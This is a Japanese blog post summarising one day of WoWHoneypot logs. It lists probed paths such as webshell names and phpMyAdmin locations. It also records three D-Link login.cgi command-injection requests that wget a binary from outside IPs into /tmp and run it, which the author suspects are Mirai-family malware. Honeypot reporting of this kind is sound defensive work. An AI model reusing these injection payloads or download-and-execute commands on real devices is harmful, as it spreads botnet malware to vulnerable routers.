ハニーポット簡易分析(18日目:8/25)
Honeytrapのログがうまく取得出来ていなかった関係で WoWHoneypotの簡易分析となります。今回もApache Struts2 の脆弱性(CVE-2018-11776)(S2-057)は来ていませんでした。。。。8/25分のWoWHoneypotの簡易分析となります。
WoWHoneypotの分析(8/25)
検知数:180件
<検知パス一覧>
URL パス | 概要 | マルウェア ダウンロード |
/ | インデックスファイルへのアクセス | × |
/12.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/56.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/9678.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/PMA/index.php | 調査行為(DB関連) | × |
/PMA2/index.php | 調査行為(DB関連) | × |
/_query.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/admin/PMA/index.php | 調査行為(DB関連) | × |
/admin/index.php | 調査行為(DB関連) | × |
/admin/mysql/index.php | 調査行為(DB関連) | × |
/admin/mysql2/index.php | 調査行為(DB関連) | × |
/admin/phpMyAdmin/index.php | 調査行為(DB関連) | × |
/admin/phpmyadmin2/index.php | 調査行為(DB関連) | × |
/admin/zkyzp.jsp | PW・ID 共にadminでのアクセス | × |
/ak.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/ak47.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/angge.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/aotu.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/aw.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/cainiao.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/claroline/phpMyAdmin/index.php | 調査行為(DB関連) | × |
/cmd.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/cmdd.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/cmv.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/cmx.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/conflg.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/data.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/db.init.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/db__.init.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/db_cts.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/db_pma.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/db_session.init.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/dbadmin/index.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/defect.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/desktop.ini.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/fack.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/favicon.ico | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/feixiang.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/fileserver/sex../../..%5Cadmin/zkyzp.jsp | PUTコマンドの試行 | × |
/help.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/hh.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/hm.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/index.php | indexファイルへのアクセス | × |
/infoo.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/ip.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/java.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/l7.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/l8.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/lala-dpr.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/lindex.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/log.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/login.cgi?cli=aa%20aa%27;wget%20hxxp://176[.]32[.]32[.]156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ | D-Linkの脆弱性を狙った攻撃 | ○ |
/login.cgi?cli=aa%20aa%27;wget%20hxxp://199[.]195[.]254[.]118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$ | D-Linkの脆弱性を狙った攻撃 | ○ |
/login.cgi?cli=aa%20aa%27;wget%20hxxp://209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ | D-Linkの脆弱性を狙った攻撃 | ○ |
/lol.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/manager/html | Tomcat管理マネージャーへのアクセス | × |
/min.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/muhstik-dpr.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/muhstik.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/muhstik2.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/muhstiks.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/mx.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/myadmin/index.php | 調査行為(DB関連) | × |
/myadmin2/index.php | 調査行為(DB関連) | × |
/mysql-admin/index.php | 調査行為(DB関連) | × |
/mysql/index.php | 調査行為(DB関連) | × |
/mysqladmin/index.php | 調査行為(DB関連) | × |
/mz.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/pe.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/phpMyAdmin.old/index.php | 調査行為(DB関連) | × |
/phpMyAdmin/index.php | 調査行為(DB関連) | × |
/phpMyAdmin/phpMyAdmin/index.php | 調査行為(DB関連) | × |
/phpMyAdminold/index.php | 調査行為(DB関連) | × |
/phpMyadmin_bak/index.php | 調査行為(DB関連) | × |
/phpadmin/index.php | 調査行為(DB関連) | × |
/phpma/index.php | 調査行為(DB関連) | × |
/phpmyadmin-old/index.php | 調査行為(DB関連) | × |
/phpmyadmin0/index.php | 調査行為(DB関連) | × |
/phpmyadmin1/index.php | 調査行為(DB関連) | × |
/phpmyadmin2/index.php | 調査行為(DB関連) | × |
/phpstudy.php | 調査行為(DB関連) | × |
/pma-old/index.php | 調査行為(DB関連) | × |
/pmamy/index.php | 調査行為(DB関連) | × |
/pmamy2/index.php | 調査行為(DB関連) | × |
/pmd/index.php | 調査行為(DB関連) | × |
/q.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/qaq.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/qq.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/s.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/sheep.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/ssaa.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/system.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/test.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/text.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/tools/phpMyAdmin/index.php | 調査行為(DB関連) | × |
/typo3/phpmyadmin/index.php | 調査行為(DB関連) | × |
/uploader.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/w.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/wanan.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/wc.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/web/phpMyAdmin/index.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/webdav/ | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/webslee.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/weixiao.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/wp-config.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/wpo.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/wshell.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/wuwu11.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/www/phpMyAdmin/index.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/x.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/xampp/phpmyadmin/index.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/xiao.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/xiaoma.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/xshell.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/xw.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/xw1.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/xx.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/yao.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/yumo.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/z.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/zuoshou.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
<マルウェアダウンロード>
D-Linkの脆弱性を狙った攻撃を検知していますが、おそらくMirai系だと思います。時間があるときにここらのマルウェアは分析したいですね。
・wget hxxp://176[.]32[.]32[.]156/bin
→VirusTotal
・wget hxxp://199[.]195[.]254[.]118/dlink
・wget hxxp://209[.]141[.]33[.]86/d
→VirusTotal
以上、簡易分析となります。